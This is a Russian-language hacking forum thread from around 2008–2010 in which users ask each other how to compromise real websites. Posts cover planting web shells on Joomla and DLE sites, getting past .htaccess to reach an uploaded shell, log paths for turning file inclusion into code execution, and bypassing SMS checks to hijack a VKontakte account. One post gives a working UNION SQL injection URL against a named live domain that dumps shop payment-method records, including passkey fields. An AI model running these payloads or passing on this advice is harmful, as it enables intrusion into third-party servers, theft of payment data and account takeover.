Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    есть доступ к консоли машины через скул. Вопрос можно ли открыть там порт для рдп? Я создал учетку но коннект нету вообше.
     
  2. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Устанавливаю в joomla мод com_joomlaxplorer_1.6.3
    А он мне выдает ошибку "Внимание! - Не удалось переместить файл"
    что тут не так?
     
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Права

    // Здесь был Кэп
     
  4. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    А какие именно права?
     
  5. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    На запись (Chmod )=\
    // кэп где то рядом
     
  6. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    А какие ещо есть способы залить шел?
     
  7. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Тэмплэйты редактировать, там обычно PHP код, языки (х.з. кто-то ляпнул где-то, сам не проверял), Xplorer, и смотри чо там по компонентам есть.
     
  8. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Ctacok, php нигде не потдерживаеться, просто как текст обычный выводиться...
     
  9. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Edit HTML =\

    // кэп не пролетал?
     
  10. oko

    oko New Member

    Joined:
    1 May 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Народ подскажите можно как нибудь обойти htacces, суть в том что шелл залит на сайт DLE даже вычисленна прямая ссылка http://site.ru/category/m.y/d/shell.php но вот там стоит редирект и он выдает ложную страницу что типо файл отсуствует или 403 ошибка.. можно как то обойти?
     
  11. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Как залил шелл так же залей свою htaccess :)
     
  12. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    на прямую совсем не похожа
     
  13. oko

    oko New Member

    Joined:
    1 May 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    залила

    ну ссылка как бы через субдомен т.е site.site/*****/shel.php
    а вариант с htacces не получается, нашла дырку на сайте был написан самописный скрипт с 3 кнопками обзор и не одна не проверяется на тип файла грузит все подрят, да и сайт не хилый 150 к посещений в день ТИЦ 900 и т д... вот хотелось бы вычислить куда все это заливается... может есть способы? по другим файлам если смотреть то заливаются на субдомен но если так же сгенерировать свою ссылку в No Fold при чем не настоящая страница
     
    1 person likes this.
  14. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Вопрос по LFI.
    Какие есть пути к логам и где их можно посмотреть?
    Вот путь
    , через него я выполнил пхп команду, а где можно посмотреть под разные сервера?
     
  15. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    a1ertso
    http://forum.antichat.ru/thread49775.html
     
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Делаю запрос к БД:

    index.php?id=-157+union+select+concat_ws(0x3a,payment_method_id,
    vendor_id,
    payment_method_name,
    payment_class,
    shopper_group_id,
    payment_method_discount,
    payment_method_discount_is_percent,
    payment_method_discount_max_amount,
    payment_method_discount_min_amount,
    list_order,
    payment_method_code,
    enable_processor,
    is_creditcard,
    payment_enabled,
    accepted_creditcards,
    payment_extrainfo,
    payment_passkey),2,3,4+from+jos_vm_payment_method

    Выводится следующая ошибка:

    4:1:payPal:ps_paypal:5:0.00:0:0.00:0.00:0:pP:p:0:Y::country."' ORDER BY country_2_code ASC"; $db1->query($q); $url = "https://www.paypal.com/cgi-bin/webscr"; $tax_total = $db->f("order_tax") + $db->f("order_shipping_tax"); $discount_total = $db->f("coupon_discount") + $db->f("order_discount"); $post_variables = Array( "cmd" => "_ext-enter", "redirect_cmd" => "_xclick", "upload" => "1", "business" => PAYPAL_EMAIL, "receiver_email" => PAYPAL_EMAIL, "item_name" => $VM_LANG->_('PHPSHOP_ORDER_PRINT_PO_NUMBER').": ". $db->f("order_id"), "order_id" => $db->f("order_id"), "invoice" => $db->f("order_number"), "amount" => round( $db->f("order_subtotal")+$tax_total-$discount_total, 2), "shipping" => sprintf("%.2f", $db->f("order_shipping")), "currency_code" => $_SESSION['vendor_currency'], "address_override" => "1", "first_name" => $dbbt->f('first_name'), "last_name" => $dbbt->f('last_name'), "address1" => $dbbt->f('address_1'), "address2" => $dbbt->f('address_2'), "zip" => $dbbt->f('zip'), "city" => $dbbt->f('city'), "state" => $dbbt->f('state'), "country" => $db1->f('country_2_code'), "email" => $dbbt->f('user_email'), "night_phone_b" => $dbbt->f('phone_1'), "cpp_header_image" => $vendor_image_url, "return" => SECUREURL ."index.php?option=com_virtuemart&page=checkout.result&order_id=".$db->f("order_id"), "notify_url" => SECUREURL ."administrator/components/com_virtuemart/notify.php", "cancel_return" => SECUREURL ."index.php", "undefined_quantity" => "0", "test_ipn" => PAYPAL_DEBUG, "pal" => "NRUBJXESJTY24", "no_shipping" => "1", "no_note" => "1" ); if( $page == "checkout.thankyou" ) { $query_string = "?"; foreach( $post_variables as $name => $value ) { $query_string .= $name. "=" . urlencode($value) ."&"; } vmRedirect( $url . $query_string ); } else { echo '
    '; echo ''; foreach( $post_variables as $name => $value ) { echo ''; } echo '
    '; } ?>:

    Доступа к админке нет.

    Это можно как-то раскрутить?
     
  17. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    4:1:payPals_paypal:5:0.00:0:0.00:0.00:0:pP:p:0:Y ::country

    а это что?
     
  18. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    http://ethanol.li/techtab.php?id=-157+union+select+concat_ws(0x3a,payment_method_id,
    vendor_id,
    payment_method_name,
    payment_class,
    shopper_group_id,
    payment_method_discount,
    payment_method_discount_is_percent,
    payment_method_discount_max_amount,
    payment_method_discount_min_amount,
    list_order,
    payment_method_code,
    enable_processor,
    is_creditcard,
    payment_enabled,
    accepted_creditcards,
    payment_extrainfo,
    payment_passkey),2,3,4+from+ilseboc_joom.jos_vm_payment_method+limit+3,1+--+&uri=/products.php?id=157&lang=fr
     
  19. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    я не понимаю... что те именно раскрутить? кажется ты уже все раскрутил
     
  20. Error0980

    Error0980 New Member

    Joined:
    24 Apr 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте!
    Добыл мыло и хотел бы выслать на него пароль от "вконтакте" но не так все просто как казалось бы, от меня соц. сеть требует ввести номер телефона введенного при регестрации пользователем "вконтакте" и получит на этот номер код для смены пароля.
    Вопрос:как можно обойти смс и выслать пароль на почту?
    Взарание спс...
     
Thread Status:
Not open for further replies.